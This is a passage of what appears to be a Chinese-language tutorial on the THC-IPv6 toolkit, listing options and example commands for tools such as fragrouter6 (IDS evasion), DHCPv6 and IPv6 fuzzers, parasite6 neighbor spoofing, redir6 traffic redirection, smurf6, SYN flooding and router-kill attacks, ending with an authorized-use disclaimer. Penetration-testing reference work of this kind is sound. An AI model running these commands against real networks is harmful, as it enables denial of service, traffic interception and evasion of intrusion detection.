atk6-fragmentation6 -f eth0 fe80::20c:29ff:fef4:8e14 1
atk6-fragmentation6 -fp eth0 fe80::20c:29ff:fef4:8e14 2
atk6-fragmentation6 -n 10 eth0 fe80::20c:29ff:fef4:8e14

45. atk6-fragrouter6

对所有来自您的系统或通过它的已定义数据包执行 NIDS/NIPS 规避。所有规避方法都可以组合(加在一起),但一次只能使用 64 或 128 中的一个。

bash 复制代码
atk6-fragrouter6 -h

选项 1024 可与 1..31 和 64 一起使用。规避方法按以下顺序处理:256、512、2048、1..31/33..63,然后是 64 或 128,然后是 1024。需要设置跳转到 NFQUEUE 的 ip6table 规则,使用 fragrouter6.sh。它是 ip6tables 和 fragrouter6 的包装器!

规避方法

0 无操作

1-31 要插入的原子碎片标头的数量

32 使用 1-31 的目标标头而不是碎片标头

64 将每个数据包分割为 8 字节长度的片段(或更改为-f)

128 一个大型目标报头,用于对数据包进行分段

256 插入伪造的 TCP 数据,其跳数仅用于 IDS (-e)

512 插入 TCP 连接重置数据包,其跳数仅用于 IDS (-e)

1024 插入伪造的分段数据,其跳数仅用于 IDS (-e)

2048 插入伪造的 seq/ack 数据 TCP 数据包

45.1 -f len

迷你片段的大小(选项 64,默认为 8)

bash 复制代码
atk6-fragrouter6 -f 6 eth0 64

45.2 -e count

到 IDS 的跳数以规避(选项 256 和 512)

bash 复制代码
atk6-fragrouter6 -e 15 eth0 512

45.3 -t count

到达目标的跳数

45.4 -v

详细模式,打印所有为规避而处理的数据包

bash 复制代码
atk6-fragrouter6 -e 15 -t 20 -v eth0 1024

46. atk6-fuzz_dhcpc6

发送到 DHCPv6 客户端的模糊消息

bash 复制代码
atk6-fuzz_dhcpc6 -h

选项

-1 fuzz DHCPv6 请求

-2 fuzz DHCPv6 通告(默认)

-3 fuzz DHCPv6 请求

-4 fuzz DHCPv6 确认

-5 fuzz DHCPv6 续订

-6 fuzz DHCPv6 重新绑定

-7 fuzz DHCPv6 回复

-8 fuzz DHCPv6 发布

-9 fuzz DHCPv6 拒绝

-A fuzz DHCPv6 重新配置

-B fuzz DHCPv6 信息请求

-C fuzz DHCPv6 中继转发

-D fuzz DHCPv6 中继回复

-m 也对消息类型进行模糊处理

-v ipv6 受害者的 IPv6 地址(如果未指定,则发送消息的 DHCP 客户端会受到攻击)

-x xid 受害者的事务 ID - 零表示随机(如果未指定 -v,则忽略)

-c client 受害者的客户端 ID - 零表示随机(如果未指定 -v,则忽略)

-f mac 欺骗 mac 地址

-l link 欺骗链接地址

-o options 要发送的 DHCPv6 消息选项(默认值:abcdefghijklmonpqr):

a OPTION_SERVERID

b OPTION_IA_NA

c OPTION_IA_TA

d OPTION_IAADR

e OPTION_ORO

f OPTION_PREFERENCE

g OPTION_ELAPSED_TIME

h OPTION_RELAY_MSG

i OPTION_AUTH

j OPTION_UNICAST

k OPTION_STATUS_CODE

l OPTION_RAPID_COMMIT

m OPTION_USER_CLASS

n OPTION_VENDOR_CLASS

o OPTION_VENDOR_OPTS

p OPTION_INTERFACE_ID

q OPTION_RECONF_MSG

r OPTION_RECONF_ACCEPT

bash 复制代码
atk6-fuzz_dhcpc6 -1 -f 00:11:22:33:44:55 -l example.com -v fe80::20c:29ff:fef4:8e14 -x 0 -c 0 -o a eth0

47. atk6-fuzz_dhcps6

将 DHCPv6 数据包模糊化到服务器。您只能定义 -0 ... -4 类型之一,默认为 -1。如果出现错误,则返回 -1;如果测试完成且目标活动,则返回 0;如果目标崩溃,则返回 1。

bash 复制代码
atk6-fuzz_dhcps6 -h

选项

-1 fuzz DHCPv6 请求(默认)

-2 fuzz DHCPv6 请求

-3 fuzz DHCPv6 确认

-4 fuzz DHCPv6 续订

-5 fuzz DHCPv6 重新绑定

-6 fuzz DHCPv6 释放

-7 fuzz DHCPv6 拒绝

-8 fuzz DHCPv6 信息请求

47.1 -m

模糊消息类型

bash 复制代码
atk6-fuzz_dhcps6 -m 1 eth0

47.2 -t number

从测试号码继续

bash 复制代码
atk6-fuzz_dhcps6 -m -t 10 2 eth0

47.3 -e number

从测试号码继续

bash 复制代码
atk6-fuzz_dhcps6 -e 5 3 eth0

47.4 -T number

仅执行测试号码数字

bash 复制代码
atk6-fuzz_dhcps6 -T 8 4 eth0

47.5 -n number

每个数据包发送次数(默认值:1)

bash 复制代码
 atk6-fuzz_dhcps6 -n 10 5 eth0

47.6 -f

欺骗 mac

bash 复制代码
atk6-fuzz_dhcps6 -f 6 eth0

47.7 -F

欺骗链接地址

bash 复制代码
atk6-fuzz_dhcps6 -F 7 eth0

47.8 -w sec

数据包之间等待的秒数(默认值:0)

bash 复制代码
atk6-fuzz_dhcps6 -w 10 8 eth0

47.9 -p number

每进行一次测试就执行一次活动检查(默认值:无)

bash 复制代码
atk6-fuzz_dhcps6 -p 10 8 eth0

47.10 -d

使用 -d 强制 DNS 更新,您可以在命令行上指定域名。

bash 复制代码
atk6-fuzz_dhcps6 -d 1 eth0

48. atk6-fuzz_ip6

使用可选 EH 和上层传输对 IPv6 数据包进行模糊测试

bash 复制代码
atk6-fuzz_ip6 -h

您只能定义 -0 ... -9、-P 和 -s 中的一个,默认为 -1。

请注意,-P 模糊测试目标应为 ff02::d。如果发生错误则返回 -1,如果测试完成且目标处于活动状态则返回 0,如果目标崩溃则返回 1。

选项

-X 不添加任何 ICMP/TCP 标头(传输层)

-1 模糊 ICMP6 回显请求(默认)

-2 模糊 ICMP6 邻居请求

-3 模糊 ICMP6 邻居通告

-4 模糊 ICMP6 路由器通告

-5 模糊多播侦听器报告数据包

-6 模糊多播侦听器完成数据包

-7 模糊多播侦听器查询数据包

-8 模糊多播侦听器 v2 报告数据包

-9 模糊多播侦听器 v2 查询数据包

-0 模糊节点查询数据包

48.1 -s port

模糊 TCP-SYN 数据包端口

bash 复制代码
atk6-fuzz_ip6 -s -X eth0 fe80::20c:29ff:fef4:8e14

48.2 -P type

fuzz PIMv2 类型数据包(hello、bootstrap、assert)

bash 复制代码
atk6-fuzz_ip6 -P hello eth0 fe80::20c:29ff:fef4:8e14

48.3 -x

尝试所有 256 个标志和字节类型的值

bash 复制代码
atk6-fuzz_ip6 -x eth0 fe80::20c:29ff:fef4:8e14

48.4 -t number

从测试编号继续

bash 复制代码
atk6-fuzz_ip6 -x -2 eth0 fe80::20c:29ff:fef4:8e14

48.5 -T number

仅执行测试编号数字

bash 复制代码
atk6-fuzz_ip6 -t 3 -3 eth0 fe80::20c:29ff:fef4:8e14

48.6 -p number

每进行一次测试(默认:无)执行一次活动检查

bash 复制代码
atk6-fuzz_ip6 -p 4 -4 eth0 fe80::20c:29ff:fef4:8e14

48.7 -a

不执行初始和最终活动测试

bash 复制代码
atk6-fuzz_ip6 -a -5 eth0 fe80::20c:29ff:fef4:8e14

48.8 -n number

发送每个数据包的次数(默认:1)

bash 复制代码
atk6-fuzz_ip6 -n 6 -6 eth0 fe80::20c:29ff:fef4:8e14

48.9 -I

也模糊 IP 标头

bash 复制代码
atk6-fuzz_ip6 -l -7 eth0 fe80::20c:29ff:fef4:8e14

48.10 -F

添加一次性碎片,并对其进行模糊测试(对于 1)

bash 复制代码
atk6-fuzz_ip6 -F -8 eth0 fe80::20c:29ff:fef4:8e14

48.11 -S

添加源路由,并对其进行模糊测试(对于 1)

bash 复制代码
atk6-fuzz_ip6 -S -9 eth0 fe80::20c:29ff:fef4:8e14

48.12 -D

添加目标标头,并对其进行模糊测试(对于 1)

bash 复制代码
atk6-fuzz_ip6 -D -0 eth0 fe80::20c:29ff:fef4:8e14

48.13 -H

添加逐跳标头,并对其进行模糊测试(对于 1 和 5-9)

bash 复制代码
atk6-fuzz_ip6 -H -1 eth0 fe80::20c:29ff:fef4:8e14

48.14 -R

添加路由器警报标头,并对其进行模糊测试(对于 5-9 和所有)

bash 复制代码
atk6-fuzz_ip6 -R -2 eth0 fe80::20c:29ff:fef4:8e14

48.15 -J

添加巨型数据包标头,并对其进行模糊测试(对于 1)

bash 复制代码
atk6-fuzz_ip6 -J -3 eth0 fe80::20c:29ff:fef4:8e14

49. atk6-implementation6

执行一些 IPv6 实施检查,也可用于测试一些防火墙功能。大约需要 2 分钟才能完成。

bash 复制代码
atk6-implementation6 -h

49.1 -s sourceip6

使用指定的源 IPv6 地址

49.2 -p

不在开始和结束时执行活动检查

bash 复制代码
atk6-implementation6 -p -s fe80::2 eth0 fe80::20c:29ff:fef4:8e14

50. atk6-implementation6d

通过 implementation6 工具识别测试数据包,有助于检查哪些数据包通过了防火墙

bash 复制代码
atk6-implementation6d -h
bash 复制代码
atk6-implementation6d eth0

51. atk6-inject_alive6

此工具响应 PPPoE 和 6in4 隧道上的保持活动请求;对于 PPPoE 它还会发送保持活动请求。请注意,必须设置适当的环境变量 THC_IPV6_{PPPOE|6IN4}

bash 复制代码
atk6-inject_alive6 -h

选项 -a 将每 15 秒主动发送活动请求。

选项 -p 将不会发送对活动请求的回复。

bash 复制代码
atk6-inject_alive6 -ap eth0

52. atk6-inverse_lookup6

执行反向地址查询,以获取分配给 MAC 地址的 IPv6 地址。请注意,目前只有少数系统支持此功能。

bash 复制代码
atk6-inverse_lookup6 -h
bash 复制代码
atk6-inverse_lookup6 eth0 00:11:22:33:44:55

53. atk6-kill_router6

宣布目标路由器即将关闭,并将其从路由表中删除。

如果您提供"*"作为路由器地址,此工具将嗅探网络中是否存在RA 数据包并立即发送终止数据包。

bash 复制代码
atk6-kill_router6 -h

选项 -H 添加逐跳、-F 分段标头和 -D dst 标头。

bash 复制代码
atk6-kill_router6 -HFD eth0 fe80::20c:29ff:fef4:8e14

54. atk6-ndpexhaust26

使用 ICMPv6 TooBig 错误淹没目标 /64 网络消息。此工具版本比 ndpexhaust6 有效很多倍。

bash 复制代码
atk6-ndpexhaust26 -h

-a 添加带有路由器警报的逐跳标头

-c 不计算校验和以节省时间

-p 发送 ICMPv6 回显请求

-P 发送 ICMPv6 回显回复

-T 发送 ICMPv6 生存时间已结束

-U 发送 ICMPv6 不可达(无路由)

-r 从 /64 前缀随机化源

-R 完全随机化源

-m 生成最大大小的数据包

-s sourceip6 将此用作源 IPv6 地址

bash 复制代码
atk6-ndpexhaust26 -acpPTUrRm -s fe80::1 eth0 fe80::20c:29ff:fef4:8e14

55. atk6-ndpexhaust6

随机 ping 目标网络中的 IP。请注意:ndpexhaust6 已弃用,请使用 ndpexhaust26!

bash 复制代码
atk6-ndpexhaust6 -h
bash 复制代码
atk6-ndpexhaust6 eth0 ff80::01/16

56. atk6-node_query6

向目标发送 ICMPv6 节点查询请求并转储回复。

bash 复制代码
atk6-node_query6 -h
bash 复制代码
atk6-node_query6 eth0 fe80::20c:29ff:fef4:8e14

57. atk6-parasite6

这是 IPv6 的"ARP​​ 欺骗器",通过对邻居请求做出错误回答,将所有本地流量重定向到您自己的系统(如果不存在 fake-mac,则为涅槃)

bash 复制代码
atk6-parasite6 -h

选项 -l 循环并每 5 秒重新发送每个目标的数据包。

选项 -R 还将尝试注入请求的目的地

NS 安全绕过:-F 片段、-H 逐跳和 -D 大目标标头

bash 复制代码
atk6-parasite6 -lRFHD eth0

58. atk6-passive_discovery6

被动嗅探网络并转储检测到的所有客户端 IPv6 地址。

请注意,在交换环境中,如果另外启动 parasite6,则可以获得更好的结果,但这会影响网络。如果在接口后指定了脚本名称,则将以检测到的 ipv6 地址作为第一个选项、以接口作为第二个选项来调用该脚本。

bash 复制代码
atk6-passive_discovery6 -h

-D 也转储目标地址(不适用于 -m)

-s 仅打印地址,不输出其他内容

-m maxhop 转储目标可能离开的最大跳数。0 表示仅限本地,有意义的最大数量通常为 5

-R prefix 将定义的前缀与链接本地前缀交换

bash 复制代码
atk6-passive_discovery6 -Ds -R fe80 eth0
atk6-passive_discovery6 -m 5 -R fe80 eth0

59. atk6-randicmp6

将所有 ICMPv6 类型和代码组合发送到目标。

bash 复制代码
atk6-randicmp6 -h

选项 -s 设置源 IPv6 地址。

选项 -p 不会打印收到的答案。

bash 复制代码
atk6-randicmp6 -p -s fe80 eth0 fe80::20c:29ff:fef4:8e14

60. atk6-redir6

将路由植入 victim-ip,将所有流量重定向到 target-ip 到new-ip。您必须知道处理路由的路由器。如果 new-router-mac 不存在,则会导致 DOS。如果目标的 TTL 不是 64,则指定这是最后一个选项。

bash 复制代码
atk6-redir6 -h
bash 复制代码
atk6-redir6 eth0 fe80::1 fe80::2 fe80::3 fe80::4

61. atk6-redirsniff6

在 victim-ip 中植入路由,将所有到 destination-ip 的流量重定向到 new-router。所有经过的、与 victim->target 匹配的流量都会执行此操作。您必须知道处理该路由的路由器。

如果 new-router/-mac 不存在,则会导致 DOS。您可以为 victim-ip 和/或 destination-ip 提供通配符 ('*')。

bash 复制代码
atk6-redirsniff6 -h
bash 复制代码
atk6-redirsniff6 eth0 fe80::1 fe80::2 fe80::3 fe80::4

62. atk6-rsmurf6

对受害者的本地网络进行 Smurf 攻击。注意:这取决于实现错误,目前仅在 Linux 上验证。

Evil:"ff02::1"作为受害者将完全对您的本地 LAN 进行 DOS 攻击

bash 复制代码
atk6-rsmurf6 -h
bash 复制代码
atk6-rsmurf6 eth0 fe80::20c:29ff:fef4:8e14

63. atk6-sendpees6

发送 SEND 邻居请求消息并使目标验证大量 CGA 和 RSA 签名

bash 复制代码
atk6-sendpees6 -h
bash 复制代码
atk6-redir6 eth0 fe80::1 fe80::2 fe80::3 fe80::4

64. atk6-sendpeesmp6

发送 SEND 邻居请求消息,并使目标验证大量 CGA 和 RSA 签名

原始 sendpees 由 willdamn <willdamn@gmail.com> 编写

修改后的 sendpeesMP 由 Marcin Pohl <marcinpohl@gmail.com> 基于 thc-ipv6 的代码编写

bash 复制代码
atk6-sendpeesmp6 -h
bash 复制代码
atk6-sendpeesmp6 eth0 2048 fe80:: fe80::1

65. atk6-smurf6

使用 icmp echo 回复对目标进行 Smurf。如果未指定,则 echo 请求的目标是本地所有节点多播地址

bash 复制代码
atk6-smurf6 -h
bash 复制代码
atk6-smurf6 -i 1000 eth0 fe80::20c:29ff:fef4:8e14

66. atk6-thcping6

使用特殊 IPv6 或 EH 标头选项制作 ICMPv6/TCP/UDP 数据包。

如果出现错误或没有回复,则返回 -1;如果回复正常,则返回 0;如果回复错误,则返回 1。

bash 复制代码
atk6-thcping6 -h

66.1 -x

泛洪模式(不检查回复)

bash 复制代码
atk6-thcping6 -x eth0 fe80:: fe80::20c:29ff:fef4:8e14

66.2 -w ms

数据包之间的等待时间(以毫秒为单位)(默认值:1000,如果 -n 不为 1)

bash 复制代码
atk6-thcping6 -w 1000 eth0 fe80:: fe80::20c:29ff:fef4:8e14

66.3 -a

添加带有路由器警报选项的逐跳标头。

66.4 -q

添加带有快速启动选项的逐跳标头。

66.5 -E

以 ethertype IPv4 发送

66.6 -e

ethertype 以指定的 ethertype 发送(十六进制!)

66.7 -H t:l:v

添加带有特殊内容的逐跳标头

66.8 -D t:l:v

添加带有特殊内容的目标标头

66.9 -D "xxx"

添加大型目标标头,用于对数据包进行分段

bash 复制代码
atk6-thcping6 -Eaq -e 0x86DD -H 1:2:0eab -D 1:2:0eab eth0 fe80:: fe80::20c:29ff:fef4:8e14

66.10 -f

添加一次性分段标头

66.11 -F ipv6address

使用源路由到此最终目标

66.12 -t ttl

指定 TTL(默认值:255)

66.13 -c class

指定类(0-4095)

66.14 -l label

指定标签(0-1048575)

bash 复制代码
atk6-thcping6 -f -F fe80::3 -t 255 -c 2048 -l 1000 eth0 fe80:: fe80::20c:29ff:fef4:8e14

66.15 -L length

设置伪造的有效负载长度(0-65535)

66.16 -N nextheader

设置伪造的下一个标头(0-255)

66.17 -V version

设置 IP 版本(0-15)

66.18 -d data_size

定义 ping 数据缓冲区的大小

bash 复制代码
atk6-thcping6 -L 2048 -N 128 -V 8 -d 100 eth0 fe80:: fe80::20c:29ff:fef4:8e14

66.19 -O

发送 TCP Fast Open cookie 请求选项(需要 -S)

66.20 -T number

ICMPv6发送类型(默认值:128 = ping)

bash 复制代码
atk6-thcping6 -T 128 eth0 fe80:: fe80::20c:29ff:fef4:8e14

66.21 -C number

发送 ICMPv6 代码数(默认值:0)

66.22 -S port

在定义的端口上使用 TCP SYN 数据包,而不是 ping

bash 复制代码
atk6-thcping6 -O -S 128 eth0 fe80:: fe80::20c:29ff:fef4:8e14

66.23 -U port

在定义的端口上使用 UDP 数据包,而不是 ping

66.24 -n count

发送数据包的频率(默认值:1)

bash 复制代码
atk6-thcping6 -U 80 -n 1 eth0 fe80:: fe80::20c:29ff:fef4:8e14

t:l:v 语法:类型:长度:值,值为十六进制,例如 1:2:0eab。您可以将"x"放入 src6、srcmac 和 dstmac 中以获取自动值。

67. atk6-thcsyn6

用 TCP-SYN 数据包淹没目标端口。如果您提供"x"作为端口,则它是随机的。

bash 复制代码
atk6-thcsyn6 -h

-i 发送数据包间隔(以微秒为单位)

-a 添加带有路由器警报的逐跳标头

-d 添加目标标头(最多可设置 64 次)

-f 添加原子碎片标头(最多可设置 64 次)

-A 发送 TCP-ACK 数据包

-S 发送 TCP-SYN-ACK 数据包

-r 从 /64 前缀随机化源

-R 完全随机化源

-D 随机化目标(视为 /64)

-O 添加 TCP Fast Open cookie (仅 SYN 数据包)

-m dstmac 使用此目标 mac 地址

-s sourceip6 使用此地址作为源 IPv6 地址

-p port 使用固定源端口

bash 复制代码
atk6-thcsyn6 -aAcdDfrORS -i 2000 -m 00:11:22:33:44:55 -p 80 -s fe80:: eth0 fe80::20c:29ff:fef4:8e14 8080

68. atk6-toobig6

在目标上植入指定的 mtu。如果目标的 TTL 不是 64,则将其指定为最后一个选项。

bash 复制代码
atk6-toobig6 -h

选项 -u 将发送 TooBig,而无需从现有 ip 发送欺骗性的 ping6。

bash 复制代码
atk6-toobig6 -u eth0 fe80::1 fe80::2 1400

69. atk6-toobigsniff6

嗅探来自目标的数据包,并根据指定 MTU 的数据包发送 ICMPv6 过大错误消息。如果您提供 '*' 作为地址,则将使用任何全局流量嗅探。

bash 复制代码
atk6-toobigsniff6 -h

如果您提供选项 -c,该工具不会在第一个数据包匹配时退出,而是继续运行并发送数据包,直到中止。

bash 复制代码
atk6-toobigsniff6 -c eth0 fe80::1 fe80::2 1400

70. atk6-trace6

一个基本但非常快速的 traceroute6 程序。

bash 复制代码
atk6-trace6 -h

如果未指定端口,则使用 ICMP6 Ping 请求,否则将 TCP SYN数据包发送到指定端口。选项 D、E 和 F 可以多次使用。

70.1 -a

插入带有路由器警报选项的逐跳标头。

bash 复制代码
atk6-trace6 -a -s fe80:: eth0 fe80::20c:29ff:fef4:8e14 80

70.2 -D

插入目标扩展标头

bash 复制代码
atk6-trace6 -D eth0 fe80::20c:29ff:fef4:8e14 80 

70.3 -E

插入带有无效选项的目标扩展标头

bash 复制代码
atk6-trace6 -E eth0 fe80::20c:29ff:fef4:8e14 80

70.4 -F

插入一次性碎片标头

bash 复制代码
atk6-trace6 -F eth0 fe80::20c:29ff:fef4:8e14 80

70.5 -b

不要使用 ICMP6 Ping,而是使用 TooBig(您将看不到目标)

bash 复制代码
atk6-trace6 -b eth0 fe80::20c:29ff:fef4:8e14 80

70.6 -B

不要使用 ICMP6 Ping,而是使用 PingReply(您将看不到目标)

bash 复制代码
atk6-trace6 -B eth0 fe80::20c:29ff:fef4:8e14

70.7 -d

将 IPv6 地址解析为 DNS。

70.8 -t

启用隧道检测

70.9 -u

如果提供了端口,则使用 UDP 而不是 TCP

bash 复制代码
atk6-trace6 -dtu eth0 fe80::20c:29ff:fef4:8e14 80

70.10 -r

原始模式(适用于没有以太网的适配器网络)

bash 复制代码
atk6-trace6 -r eth0 fe80::20c:29ff:fef4:8e14

70.11 -s src6

指定源 IPv6 地址

最大跳数范围:31

bash 复制代码
atk6-trace6 -s fe80:: eth0 fe80::20c:29ff:fef4:8e14

总结

THC-IPv6工具提供强大的网络渗透测试功能,通过多种模块实现IPv6环境中的漏洞利用和安全测试,是研究协议实现和检测网络漏洞的实用工具。

在此特别强调,本教程仅在合法授权的情况下进行测试和研究,请勿用于其他用途。未经授权使用此类工具可能会侵犯他人隐私,触犯相关法律,任何因此引发的法律或利益纠纷与本人无关。

欢迎各位大佬,小白来找我交流。

相关推荐
墨子裳28 分钟前
Linux入门——权限
linux·运维·服务器
昵称难产中29 分钟前
浅谈云计算09 | 服务器虚拟化
linux·运维·服务器·云计算
zstar-_43 分钟前
个人主页搭建全流程(Nginx部署+SSL配置+DCDN加速)
运维·nginx·ssl
hong_zc1 小时前
网络原理(四)—— 网络层、数据链路层 与 DNS
网络·dns·数据链路层·网络层
兔帮大人1 小时前
Nginx防止点击劫持:X-Frame-Options
运维·nginx
云计算DevOps-韩老师1 小时前
【网络云SRE运维开发】2025第3周-每日【2025/01/14】小测-【第13章ospf路由协议】理论和实操解析
网络·智能路由器·运维开发
真想骂*1 小时前
自动化解决方案:修复devicedisplaystatusmanager.dll丢失
运维·microsoft·自动化
打鱼又晒网1 小时前
linux网络 | https前置知识 | 数据加密与解密、数据摘要
网络·网络协议·https
路星辞*1 小时前
PBR(策略路由)的几种使用方式
运维·服务器·网络·安全·pbr
Cikiss2 小时前
HTTP详解——HTTP基础
网络·网络协议·计算机网络·http